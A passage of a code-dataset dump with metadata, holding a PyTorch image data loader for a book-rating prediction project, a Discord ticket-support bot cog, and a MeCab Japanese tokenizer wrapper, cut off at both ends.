"call"}, {"api_name": "flask_login.login_required", "line_number": 11, "usage_type": "name"}, {"api_name": "models.ContactTable.query.all", "line_number": 19, "usage_type": "call"}, {"api_name": "models.ContactTable.query", "line_number": 19, "usage_type": "attribute"}, {"api_name": "models.ContactTable", "line_number": 19, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 21, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 17, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 27, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 27, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 27, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 28, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 28, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 28, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 29, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 29, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 29, "usage_type": "name"}, {"api_name": "flask_login.current_user.username", "line_number": 30, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 30, "usage_type": "name"}, {"api_name": "models.db.session.query", "line_number": 33, "usage_type": "call"}, {"api_name": "models.ContactTable", "line_number": 33, "usage_type": "argument"}, {"api_name": "models.db.session", "line_number": 33, "usage_type": "attribute"}, {"api_name": "models.db", "line_number": 33, "usage_type": "name"}, {"api_name": "models.ContactTable.CONTACT_ID", "line_number": 33, "usage_type": "attribute"}, {"api_name": "models.db.session.query", "line_number": 36, "usage_type": "call"}, {"api_name": "models.ContactTable", "line_number": 36, "usage_type": "argument"}, {"api_name": "models.db.session", "line_number": 36, "usage_type": "attribute"}, {"api_name": "models.db", "line_number": 36, "usage_type": "name"}, {"api_name": "models.ContactTable.CONTACT_ID", "line_number": 36, "usage_type": "attribute"}, {"api_name": "models.LogsTable", "line_number": 39, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 39, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 39, "usage_type": "name"}, {"api_name": "models.db.session.add", "line_number": 40, "usage_type": "call"}, {"api_name": "models.db.session", "line_number": 40, "usage_type": "attribute"}, {"api_name": "models.db", "line_number": 40, "usage_type": "name"}, {"api_name": "models.db.session.commit", "line_number": 43, "usage_type": "call"}, {"api_name": "models.db.session", "line_number": 43, "usage_type": "attribute"}, {"api_name": "models.db", "line_number": 43, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 45, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 24, "usage_type": "name"}]} +{"seq_id": "73413948324", "text": "import numpy as np\nimport pandas as pd\nfrom PIL import Image\nfrom sklearn.model_selection import train_test_split\nimport torchvision.transforms as transforms\nimport torch\nfrom torch.utils.data import DataLoader, Dataset\nfrom torch.autograd import Variable\nfrom tqdm import tqdm\n\nfrom .context_data import process_context_data\nfrom .Preprocess import preprocess\nimport os\n\n\nclass Image_Dataset(Dataset):\n def __init__(self, user_isbn_vector, img_vector, label):\n \"\"\"\n Parameters\n ----------\n user_isbn_vector : np.ndarray\n 벡터화된 유저와 책 데이터를 입렵합니다.\n img_vector : np.ndarray\n 벡터화된 이미지 데이터를 입력합니다.\n label : np.ndarray\n 정답 데이터를 입력합니다.\n ----------\n \"\"\"\n self.user_isbn_vector = user_isbn_vector\n self.img_vector = img_vector\n self.label = label\n def __len__(self):\n return self.user_isbn_vector.shape[0]\n def __getitem__(self, i):\n return {\n 'user_isbn_vector' : torch.tensor(self.user_isbn_vector[i], dtype=torch.long),\n 'img_vector' : torch.tensor(self.img_vector[i], dtype=torch.float32),\n 'label' : torch.tensor(self.label[i], dtype=torch.float32),\n }\n\n\ndef image_vector(path):\n \"\"\"\n Parameters\n ----------\n path : str\n 이미지가 존재하는 경로를 입력합니다.\n ----------\n \"\"\"\n img = Image.open(path)\n scale = transforms.Resize((32, 32))\n tensor = transforms.ToTensor()\n img_fe = Variable(tensor(scale(img)))\n return img_fe\n\n\ndef process_img_data(df, books, user2idx, isbn2idx, train=False):\n \"\"\"\n Parameters\n ----------\n df : pd.DataFrame\n 기준이 되는 데이터 프레임을 입력합니다.\n books : pd.DataFrame\n 책 정보에 대한 데이터 프레임을 입력합니다.\n user2idx : Dict\n 각 유저에 대한 index 정보가 있는 사전을 입력합니다.\n isbn2idx : Dict\n 각 책에 대한 index 정보가 있는 사전을 입력합니다.\n ----------\n \"\"\"\n books_ = books.copy()\n books_['isbn'] = books_['isbn'].map(isbn2idx)\n\n if train == True:\n df_ = df.copy()\n else:\n df_ = df.copy()\n df_['user_id'] = df_['user_id'].map(user2idx)\n df_['isbn'] = df_['isbn'].map(isbn2idx)\n\n df_ = pd.merge(df_, books_[['isbn', 'img_path']], on='isbn', how='left')\n # df_['img_path'] = df_['img_path'].apply(lambda x: 'data/'+x)\n df_['img_path'] = df_['img_path'].apply(lambda x: '/opt/ml/data/'+x)\n img_vector_df = df_[['img_path']].drop_duplicates().reset_index(drop=True).copy()\n data_box = []\n for idx, path in tqdm(enumerate(sorted(img_vector_df['img_path']))):\n data = image_vector(path)\n if data.size()[0] == 3:\n data_box.append(np.array(data))\n else:\n data_box.append(np.array(data.expand(3, data.size()[1], data.size()[2])))\n img_vector_df['img_vector'] = data_box\n df_ = pd.merge(df_, img_vector_df, on='img_path', how='left')\n return df_\n\n\ndef image_data_load(args):\n \"\"\"\n Parameters\n ----------\n Args : argparse.ArgumentParser\n data_path : str\n 데이터가 존재하는 경로를 입력합니다.\n test_size : float\n Train/Valid split 비율을 입력합니다.\n seed : int\n seed 값을 입력합니다.\n batch_size : int\n Batch size를 입력합니다.\n ----------\n \"\"\"\n users = pd.read_csv(args.users_data)\n books = pd.read_csv(args.books_data)\n train = pd.read_csv(args.data_path + 'train_ratings.csv')\n test = pd.read_csv(args.data_path + 'test_ratings.csv')\n sub = pd.read_csv(args.data_path + 'sample_submission.csv')\n\n ids = pd.concat([train['user_id'], sub['user_id']]).unique()\n isbns = pd.concat([train['isbn'], sub['isbn']]).unique()\n\n idx2user = {idx:id for idx, id in enumerate(ids)}\n idx2isbn = {idx:isbn for idx, isbn in enumerate(isbns)}\n\n user2idx = {id:idx for idx, id in idx2user.items()}\n isbn2idx = {isbn:idx for idx, isbn in idx2isbn.items()}\n\n train['user_id'] = train['user_id'].map(user2idx)\n sub['user_id'] = sub['user_id'].map(user2idx)\n\n train['isbn'] = train['isbn'].map(isbn2idx)\n sub['isbn'] = sub['isbn'].map(isbn2idx)\n\n is_dl = args.model in ('NCF', 'WDN', 'DCN', 'CNN_FM', 'DeepCoNN')\n\n if args.eda == 'default':\n users, books = process_context_data(users, books, train, test, is_dl)\n elif args.eda == 'mission1':\n users, books = mission_1_EDA(users, books, train, test, is_dl)\n elif args.eda == 'jisu':\n users, books = jisu_EDA_1(users, books, train, test, is_dl)\n elif args.eda == 'age_0413_ver1':\n users, books = age_0413_ver1(users, books, train, test, is_dl)\n elif args.eda == 'age_0413_ver2':\n users, books = age_0413_ver2(users, books, train, test, is_dl)\n elif args.eda == 'age_0413_ver4':\n users, books = age_0413_ver4(users, books, train, test, is_dl)\n elif args.eda == 'category_0414_ver1':\n users, books = category_0414_ver1(users, books, train, test, is_dl)\n elif args.eda == 'dohyun_0415_ver1':\n users, books = dohyun_0415_ver1(users, books, train, test, is_dl)\n elif args.eda == 'dohyun_0415_ver4':\n users, books = dohyun_0415_ver4(users, books, train, test, is_dl) \n\n img_train = process_img_data(train, books, user2idx, isbn2idx, train=True)\n img_test = process_img_data(test, books, user2idx, isbn2idx, train=False)\n\n data = {\n 'train':train,\n 'test':test,\n 'users':users,\n 'books':books,\n 'sub':sub,\n 'idx2user':idx2user,\n 'idx2isbn':idx2isbn,\n 'user2idx':user2idx,\n 'isbn2idx':isbn2idx,\n 'img_train':img_train,\n 'img_test':img_test,\n }\n return data\n\n\ndef image_data_split(args, data):\n \"\"\"\n Parameters\n ----------\n Args : argparse.ArgumentParser\n test_size : float\n Train/Valid split 비율을 입력합니다.\n seed : int\n seed 값을 입력합니다.\n data : Dict\n image_data_load로 부터 전처리가 끝난 데이터가 담긴 사전 형식의 데이터를 입력합니다.\n ----------\n \"\"\"\n X_train, X_valid, y_train, y_valid = train_test_split(\n data['img_train'][['user_id', 'isbn', 'img_vector']],\n data['img_train']['rating'],\n test_size=args.test_size,\n random_state=args.seed,\n shuffle=True\n )\n data['X_train'], data['X_valid'], data['y_train'], data['y_valid'] = X_train, X_valid, y_train, y_valid\n # train 데이터와 validation 데이터의 인덱스 분할\n train_idx, valid_idx = train_test_split(data['train'].index, test_size=args.test_size, random_state=args.seed, shuffle=True)\n\n return data\n\n\ndef image_data_loader(args, data):\n \"\"\"\n Parameters\n ----------\n Args : argparse.ArgumentParser\n batch_size : int\n Batch size를 입력합니다.\n data : Dict\n image_data_split로 부터 학습/평가/실험 데이터가 담긴 사전 형식의 데이터를 입력합니다.\n ----------\n \"\"\"\n train_dataset = Image_Dataset(\n data['X_train'][['user_id', 'isbn']].values,\n data['X_train']['img_vector'].values,\n data['y_train'].values\n )\n valid_dataset = Image_Dataset(\n data['X_valid'][['user_id', 'isbn']].values,\n data['X_valid']['img_vector'].values,\n data['y_valid'].values\n )\n test_dataset = Image_Dataset(\n data['img_test'][['user_id', 'isbn']].values,\n data['img_test']['img_vector'].values,\n data['img_test']['rating'].values\n )\n\n train_dataloader = torch.utils.data.DataLoader(train_dataset, batch_size=args.batch_size, num_workers=0, shuffle=True)\n valid_dataloader = torch.utils.data.DataLoader(valid_dataset, batch_size=args.batch_size, num_workers=0, shuffle=True)\n test_dataloader = torch.utils.data.DataLoader(test_dataset, batch_size=args.batch_size, num_workers=0, shuffle=False)\n data['train_dataloader'], data['valid_dataloader'], data['test_dataloader'] = train_dataloader, valid_dataloader, test_dataloader\n return data\n", "repo_name": "boostcampaitech5/level1_bookratingprediction-recsys-13", "sub_path": "src/data/image_data.py", "file_name": "image_data.py", "file_ext": "py", "file_size_in_byte": 8945, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.utils.data.Dataset", "line_number": 16, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 36, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 37, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 38, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 50, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 50, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 51, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 51, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 52, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 52, "usage_type": "name"}, {"api_name": "torch.autograd.Variable", "line_number": 53, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 81, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 91, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 93, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 112, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 113, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 114, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 115, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 116, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 118, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 119, "usage_type": "call"}, {"api_name": "context_data.process_context_data", "line_number": 136, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 186, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 195, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 227, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 227, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 228, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 228, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 229, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 229, "usage_type": "attribute"}]} +{"seq_id": "18313903181", "text": "import discord\r\nfrom discord.ext import commands\r\nimport sqlite3\r\nimport asyncio\r\n\r\nclass support(commands.Cog):\r\n\tdef __init__(self, bot):\r\n\t\tself.bot = bot\r\n\r\n\t@commands.command()\r\n\tasync def new(self, ctx, *args):\r\n\t\tconn = sqlite3.connect(\"discord.sqlite\")\r\n\t\tcur = conn.cursor()\r\n\t\tcur.execute(\"SELECT * FROM bot\")\r\n\t\trows = cur.fetchall()\r\n\t\ttemp = rows[0][1]\r\n\t\tif len(str(temp)) == 1:\r\n\t\t\tnumber = f\"000{temp}\"\r\n\t\telif len(str(temp)) == 2:\r\n\t\t\tnumber = f\"00{temp}\"\r\n\t\telif len(str(temp)) == 3:\r\n\t\t\tnumber = f\"0{temp}\"\r\n\t\telse:\r\n\t\t\tnumber = temp\r\n\r\n\t\tcategory = self.bot.get_channel(715125391290925107)\r\n\t\tstaffs = ctx.guild.get_role(711753639722745896)\r\n\t\toverwrites = {\r\n\t\t\tctx.guild.me: discord.PermissionOverwrite(read_messages=True, send_messages=True, manage_messages=True, manage_channels=True, manage_roles=True, read_message_history=True),\r\n\t\t\tstaffs: discord.PermissionOverwrite(read_messages=True, send_messages=True, manage_messages=True, manage_channels=True, manage_roles=True, read_message_history=True),\r\n\t\t\tctx.author: discord.PermissionOverwrite(read_messages=True, send_messages=True, manage_messages=True),\r\n\t\t\tctx.guild.default_role: discord.PermissionOverwrite(read_messages=False)\r\n\t\t}\r\n\t\tchannel = await ctx.guild.create_text_channel(name=f\"지원_{number}\", topic=f\"{str(ctx.author)} ( {ctx.author.id} ) 님의 티켓��에요.\", overwrites=overwrites, category=category, reason=f\"{str(ctx.author)}님의 티켓 개설 요청\")\r\n\t\t\r\n\t\tif not args:\r\n\t\t\tdesc = \"직접 물어보세요!\"\r\n\t\telse:\r\n\t\t\tdesc = \"\"\r\n\t\t\tfor arg in args:\r\n\t\t\t\tdesc += f\"{arg} \"\r\n\t\t\r\n\t\tembed = discord.Embed(title=f\"{str(ctx.author)}님이 지원 티켓을 만드셨어요.\", description=f\"지원 요청한 주요 내용 : {desc}\\n \\n*잠시만 기다려주세요. 지원 팀이 최대한 빨리 티켓을 확인하고 답장할 거에요!*\", color=0xFFFCC9)\r\n\t\tembed.set_author(name=\"지원\", icon_url=self.bot.user.avatar_url)\r\n\t\tdev = self.bot.get_user(526958314647453706)\r\n\t\tembed.set_footer(text=f\"Powered by {str(dev)}\", icon_url=dev.avatar_url)\r\n\t\tembed.set_thumbnail(url=ctx.guild.icon_url_as(static_format=\"png\", size=2048))\r\n\t\t\r\n\t\tmsg = await channel.send(\"@here\", embed=embed)\r\n\t\tawait msg.pin()\r\n\t\tcur.execute(f\"UPDATE bot SET tickno = {int(temp) + 1}\")\r\n\t\tconn.commit()\r\n\t\tconn.close()\r\n\t\r\n\t@commands.command()\r\n\tasync def close(self, ctx):\r\n\t\tif ctx.channel.category.id != 715125391290925107:\r\n\t\t\tawait ctx.send(f\"{ctx.author.mention} - 이 명령어는 지원 티켓 채널에서만 사용하실 수 있어요!\")\r\n\t\telse:\r\n\t\t\tstaffs = ctx.guild.get_role(711753639722745896)\r\n\t\t\tif str(ctx.author.id) in ctx.channel.topic or staffs in ctx.author.roles:\r\n\t\t\t\tmsg = await ctx.send(f\"{ctx.author.mention} - 정말로 이 티켓 채널을 비활성화하실 건가요? 비활성화 된 후에는 복구할 수 없어요!\\n<:cs_yes:659355468715786262> - 예\\n<:cs_no:659355468816187405> - 아니오\")\r\n\t\t\t\tawait msg.add_reaction(\"<:cs_yes:659355468715786262>\")\r\n\t\t\t\tawait msg.add_reaction(\"<:cs_no:659355468816187405>\")\r\n\t\t\t\tdef check(reaction, user):\r\n\t\t\t\t\treturn reaction.message.id == msg.id and user == ctx.author\r\n\t\t\t\ttry:\r\n\t\t\t\t\treaction, user = await self.bot.wait_for('reaction_add', timeout=60, check=check)\r\n\t\t\t\texcept asyncio.TimeoutError:\r\n\t\t\t\t\tawait msg.clear_reactions()\r\n\t\t\t\telse:\r\n\t\t\t\t\tawait msg.clear_reactions()\r\n\t\t\t\t\tif str(reaction.emoji) == \"<:cs_yes:659355468715786262>\":\r\n\t\t\t\t\t\tawait msg.edit(content=f\"{ctx.author.mention} - 알겠어요! 5초 후에 채널이 자동으로 비활성화될 거에요.\")\r\n\t\t\t\t\t\tawait asyncio.sleep(5)\r\n\t\t\t\t\t\ta = ctx.channel.topic.split(\"(\")[1]\r\n\t\t\t\t\t\tida = a.split(\")\")[0]\r\n\t\t\t\t\t\tuser = ctx.guild.get_member(int(ida))\r\n\t\t\t\t\t\tif user is not None:\r\n\t\t\t\t\t\t\tawait ctx.channel.set_permissions(user, overwrite=None, reason=\"티켓 채널 닫기\")\r\n\t\t\t\t\t\tdeprecated = self.bot.get_channel(715156102857228288)\r\n\t\t\t\t\t\tawait ctx.channel.edit(category=deprecated)\r\n\t\t\t\t\t\tawait user.send(f\"{ctx.author.mention} - <#{ctx.channel.id}> 채널이 닫혔어요. 티켓을 다시 여시려면 아래 채널 ID를 사용해 `r.open [ ID ]` 명령어를 사용해주세요.\\n채널 ID : {ctx.channel.id}\")\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tawait msg.edit(content=f\"{ctx.author.mention} - 알겠어요! 티켓 채널 비활성화를 취소했어요.\")\r\n\t\t\telse:\r\n\t\t\t\tawait ctx.send(f\"{ctx.author.mention} - 이 채널은 당신이 연 티켓 채널이 아니에요! 당신은 이 티켓 채널을 닫으실 수 없어요.\")\r\n\t\r\n\t@commands.command()\r\n\tasync def open(self, ctx, channel: discord.TextChannel):\r\n\t\tif channel.category.id != 715156102857228288:\r\n\t\t\tawait ctx.send(f\"{ctx.author.mention} - 이 명령어는 닫힌 지원 티켓 채널에 대해서만 사용하실 수 있어요!\")\r\n\t\telse:\r\n\t\t\tstaffs = ctx.guild.get_role(711753639722745896)\r\n\t\t\tif str(ctx.author.id) in channel.topic or staffs in ctx.author.roles:\r\n\t\t\t\tmsg = await ctx.send(f\"{ctx.author.mention} - 티켓 채널을 정말로 다시 여시겠어요?\\n<:cs_yes:659355468715786262> - 예\\n<:cs_no:659355468816187405> - 아니오\")\r\n\t\t\t\tawait msg.add_reaction(\"<:cs_yes:659355468715786262>\")\r\n\t\t\t\tawait msg.add_reaction(\"<:cs_no:659355468816187405>\")\r\n\t\t\t\tdef check(reaction, user):\r\n\t\t\t\t\treturn reaction.message.id == msg.id and user == ctx.author\r\n\t\t\t\ttry:\r\n\t\t\t\t\treaction, user = await self.bot.wait_for('reaction_add', timeout=60, check=check)\r\n\t\t\t\texcept asyncio.TimeoutError:\r\n\t\t\t\t\tawait msg.clear_reactions()\r\n\t\t\t\telse:\r\n\t\t\t\t\tawait msg.clear_reactions()\r\n\t\t\t\t\tif str(reaction.emoji) == \"<:cs_yes:659355468715786262>\":\r\n\t\t\t\t\t\tawait msg.edit(content=f\"{ctx.author.mention} - 티켓 채널을 다시 열었어요.\")\r\n\t\t\t\t\t\ta = channel.topic.split(\"(\")[1]\r\n\t\t\t\t\t\tida = a.split(\")\")[0]\r\n\t\t\t\t\t\tuser = ctx.guild.get_member(int(ida))\r\n\t\t\t\t\t\toverwrites = {\r\n\t\t\t\t\t\t\tctx.guild.me: discord.PermissionOverwrite(read_messages=True, send_messages=True, manage_messages=True, manage_channels=True, manage_roles=True, read_message_history=True),\r\n\t\t\t\t\t\t\tstaffs: discord.PermissionOverwrite(read_messages=True, send_messages=True, manage_messages=True, manage_channels=True, manage_roles=True, read_message_history=True),\r\n\t\t\t\t\t\t\tuser: discord.PermissionOverwrite(read_messages=True, send_messages=True, manage_messages=True, manage_channels=True, manage_roles=True),\r\n\t\t\t\t\t\t\tctx.guild.default_role: discord.PermissionOverwrite(read_messages=False)\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\tawait channel.edit(overwrite=overwrites, reason=\"티켓 채널 다시 열림\")\r\n\t\t\t\t\t\tactivated = self.bot.get_channel(715125391290925107)\r\n\t\t\t\t\t\tawait channel.edit(category=activated)\r\n\t\t\t\t\t\tawait channel.send(f\"@here - {ctx.author}님이 티켓을 다시 여셨어요.\\n \\n**잠시만 기다려주세요. 곧 지원 팀이 도착할거에요!**\")\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tawait msg.edit(content=f\"{ctx.author.mention} - 티켓 채널 다시 열기가 취소되었어요.\")\r\n\t\t\telse:\r\n\t\t\t\tawait ctx.send(f\"{ctx.author.mention} - 이 채널은 당신이 연 티켓 채널이 아니에요! 당신은 이 티켓 채널을 다시 열 수 없어요.\")\r\n\r\ndef setup(bot):\r\n\tbot.add_cog(support(bot))", "repo_name": "fossabot/management-bot", "sub_path": "modules/support.py", "file_name": "support.py", "file_ext": "py", "file_size_in_byte": 7050, "program_lang": "python", "lang": "ko", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "discord.ext.commands.Cog", "line_number": 6, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 6, "usage_type": "name"}, {"api_name": "sqlite3.connect", "line_number": 12, "usage_type": "call"}, {"api_name": "discord.PermissionOverwrite", "line_number": 29, "usage_type": "call"}, {"api_name": "discord.PermissionOverwrite", "line_number": 30, "usage_type": "call"}, {"api_name": "discord.PermissionOverwrite", "line_number": 31, "usage_type": "call"}, {"api_name": "discord.PermissionOverwrite", "line_number": 32, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 43, "usage_type": "call"}, {"api_name": "discord.ext.commands.command", "line_number": 10, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 10, "usage_type": "name"}, {"api_name": "asyncio.TimeoutError", "line_number": 69, "usage_type": "attribute"}, {"api_name": "asyncio.sleep", "line_number": 75, "usage_type": "call"}, {"api_name": "discord.ext.commands.command", "line_number": 55, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 55, "usage_type": "name"}, {"api_name": "discord.TextChannel", "line_number": 90, "usage_type": "attribute"}, {"api_name": "asyncio.TimeoutError", "line_number": 103, "usage_type": "attribute"}, {"api_name": "discord.PermissionOverwrite", "line_number": 113, "usage_type": "call"}, {"api_name": "discord.PermissionOverwrite", "line_number": 114, "usage_type": "call"}, {"api_name": "discord.PermissionOverwrite", "line_number": 115, "usage_type": "call"}, {"api_name": "discord.PermissionOverwrite", "line_number": 116, "usage_type": "call"}, {"api_name": "discord.ext.commands.command", "line_number": 89, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 89, "usage_type": "name"}]} +{"seq_id": "14877239969", "text": "#-*- coding:utf-8 -*-\n__author__ = 'kensuke-mi'\n\nimport io_operator\nimport sys\nimport MeCab\nimport logging\nimport subprocess\nlogging.basicConfig(level=logging.DEBUG,\n format=\"%(asctime)s %(levelname)s %(message)s\")\n\n\"\"\"\nCalls MeCab and split sentences into set of words.\n\"\"\"\n\ndef __check_mecab_dict_path__(osType):\n\n if osType==\"mac\":\n mecab_dic_cmd = 'echo `mecab-config --dicdir`'\n elif osType==\"centos\":\n mecab_dic_cmd = \"echo `/usr/local/bin/mecab-config --dicdir`\"\n\n\n path_mecab_dict = subprocess.check_output( mecab_dic_cmd, shell=True ).strip(u'\\n')\n\n return path_mecab_dict\n\n\ndef __check_mecab_libexe__(osType):\n\n if osType==\"mac\":\n mecab_libexe_cmd = 'echo `mecab-config --libexecdir`'\n elif osType==\"centos\":\n mecab_libexe_cmd = \"echo `/usr/local/bin/mecab-config --libexecdir`\"\n\n path_mecab_libexe = subprocess.check_output( mecab_libexe_cmd, shell=True ).strip(u'\\n')\n\n return path_mecab_libexe\n\n\ndef __CompileUserdict(pathUserdict, osType=\"mac\"):\n # 複合語辞書のコンパイルをする\n\n #userDictLines = [\n # line.strip(u'\\n')\n # for line in codecs.open(pathUserdict, 'r', 'utf-8').readlines()\n # if line[0] != u'#' and line != u'\\n']\n\n path_mecab_dict = __check_mecab_dict_path__(osType)\n path_mecab_libexe = __check_mecab_libexe__(osType)\n\n cmCompileDict = u'{0}/mecab-dict-index -d {1}/ipadic -u {2} -f utf-8 -t utf-8 {3} > /dev/null'.format(path_mecab_libexe,\n path_mecab_dict,\n pathUserdict.replace(\"csv\", \"dict\"),\n pathUserdict)\n logging.debug(msg=\"compiling mecab user dictionary with: {}\".format(cmCompileDict))\n try:\n subprocess.call( cmCompileDict , shell=True )\n except OSError as e:\n logging.error('type:' + str(type(e)))\n logging.error('args:' + str(e.args))\n logging.error('message:' + e.message)\n sys.exit('Failed to compile mecab userdict. System ends')\n\n return pathUserdict.replace(\"csv\", \"dict\")\n\n\n\ndef __CallMecab(pathUserDictCsv, pathNeologd, osType, mode='all'):\n \"\"\"\n Mecabの呼び出すをする\n :return:\n \"\"\"\n if mode == 'neologd':\n logging.debug('Use neologd additional dictionary')\n cmMecabInitialize = '-d {}'.format(pathNeologd)\n\n elif mode == 'all':\n logging.debug('Use neologd additional dictionary')\n pathUserDict = __CompileUserdict(pathUserDictCsv, osType)\n cmMecabInitialize = '-u {} -d {}'.format(pathUserDict, pathNeologd)\n\n\n cmMecabCall = \"-Ochasen {}\".format(cmMecabInitialize)\n logging.debug(msg=\"mecab initialized with {}\".format(cmMecabCall))\n\n try:\n mecabObj = MeCab.Tagger(cmMecabCall)\n except Exception as e:\n logging.error(e.args)\n logging.error(e.message)\n logging.error(e.args)\n sys.exit(\"Possibly Path to userdict is invalid check the path\")\n\n return mecabObj\n\n\ndef __feature_parser__(uni_feature, word_surface):\n \"\"\"\n Parse the POS feature output by Mecab\n :param uni_feature unicode:\n :return ( (pos1, pos2, pos3), word_stem ):\n \"\"\"\n list_feature_items = uni_feature.split(u',')\n pos1 = list_feature_items[0]\n pos2 = list_feature_items[1]\n pos3 = list_feature_items[2]\n tuple_pos = ( pos1, pos2, pos3 )\n\n # if without constraint(output is normal mecab dictionary like)\n if len(list_feature_items) == 9:\n word_stem = list_feature_items[6]\n # if with constraint(output format depends on Usedict.txt)\n else:\n word_stem = word_surface\n\n return tuple_pos, word_stem\n\n\ndef __split_mode_Ochasen_userdict__(sentence, mecabObj):\n \"\"\"\n :param sentence:\n :param ins_mecab:\n :param list_stopword:\n :param list_pos_candidate:\n :return: list [tuple (unicode, unicode)]\n \"\"\"\n list_sentence_processed = [] # list to save word stem of posted contents\n # don't delete this variable. encoded_text protects sentence from deleting\n encoded_text = sentence.encode('utf-8')\n\n node = mecabObj.parseToNode(encoded_text)\n node = node.next\n while node.next is not None:\n word_surface = node.surface.decode('utf-8')\n tuple_pos, word_stem = __feature_parser__(node.feature.decode('utf-8'), word_surface)\n list_sentence_processed.append( (word_stem, tuple_pos) )\n\n node = node.next\n\n return list_sentence_processed\n\n\ndef __JsonSave(pathSave, documentObj):\n \"\"\"\n\n :return:\n \"\"\"\n logging.debug(\"analyzed document is saved at: {}\".format(pathSave))\n io_operator.JsonOperator(pathSave, any_data=documentObj).write_json()\n\n\ndef __JsonLoad(documentPath):\n \"\"\"\n\n :return:\n \"\"\"\n documentObj = io_operator.JsonOperator(path_to_json=documentPath).load_json()\n return documentObj\n\n\ndef __SentenceExtractor__(documentObjects):\n sentences = [\n (index, fumanObject)\n for index, fumanObject in enumerate(documentObjects['inputArray'])\n ]\n return sentences\n\n\ndef __SentenceSpliter__(sentences, mecabObj):\n analyzedResults = {\n int(sentence[0]): __split_mode_Ochasen_userdict__(sentence[1], mecabObj)\n for sentence in sentences\n }\n return analyzedResults\n\n\ndef MecabWrapperMain(pathUserDictCsv, documentPath, pathAnalyzedData, osType=\"mac\",\n pathNeologd=\"/usr/local/lib/mecab/dic/mecab-ipadic-neologd/\"):\n\n\n mecabObj = __CallMecab(pathUserDictCsv, pathNeologd, osType)\n\n documentObjects = __JsonLoad(documentPath)\n sentences = __SentenceExtractor__(documentObjects)\n analyzedResults = __SentenceSpliter__(sentences, mecabObj)\n\n __JsonSave(pathAnalyzedData, analyzedResults)\n logging.debug(\"analyzed result is saved into {}\".format(pathAnalyzedData))\n\n return pathAnalyzedData\n\n\ndef __test():\n import os\n\n abs_path = os.path.abspath(sys.argv[0])\n abs_path_dir = os.path.dirname(abs_path)\n sys.path.append(abs_path_dir)\n os.chdir(abs_path_dir)\n\n pathUserDictCsv=\"../resources/termExtractDict.csv\"\n pathNeologd=\"/usr/local/lib/mecab/dic/mecab-ipadic-neologd/\"\n osType=\"mac\"\n mecabObj = __CallMecab(pathUserDictCsv, pathNeologd, osType)\n\n documentPath = \"../resources/input.json\"\n documentObjects = __JsonLoad(documentPath)\n sentences = __SentenceExtractor__(documentObjects)\n analyzedResults = __SentenceSpliter__(sentences, mecabObj)\n\n\n pathAnalyzedData = \"../resources/analyzed_data.json\"\n __JsonSave(pathAnalyzedData, analyzedResults)\n\n\nif __name__ == \"__main__\":\n __test()\n\n", "repo_name": "Kensuke-Mitsuzawa/docker-termExtract-jsonIO", "sub_path": "dockerfiles/python_modules/wrapper_mecab.py", "file_name": "wrapper_mecab.py", "file_ext": "py", "file_size_in_byte": 6775, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "52", "api": 